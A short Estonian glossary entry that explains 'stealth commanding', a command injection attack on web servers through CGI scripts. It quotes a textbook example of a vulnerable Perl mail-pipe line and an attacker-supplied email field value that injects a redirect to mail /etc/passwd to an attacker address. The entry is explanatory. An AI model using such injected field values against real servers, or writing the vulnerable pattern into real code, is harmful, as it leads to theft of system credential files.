stealth commanding
peitkäskrünne
olemus
rünne veebiserveri kaudu:
- suunatud veebiserverit majutavale operatsioonisüsteemile
- põhineb CGI-käskude ja päringute tõlgendamise nõrkustel
------ näiteks Perli käskudega eval ja system
täpsemalt
https://www.imperva.com/Resources/Glossary/stealth-commanding
näide
raamatust Cybersecurity Operations Handbook:
- server küsib kasutajalt teabe saatmiseks meiliaadressi ja
- selle skriptis on käsk open (MAIL, "|$mailprog $recipient")
- väljale $recipient paigutab ründaja
------ "joehacker @ nefariousways.org</etc/passwd",
------ lastes oma aadressile saata paroolifaili
vt ka
- käsusüst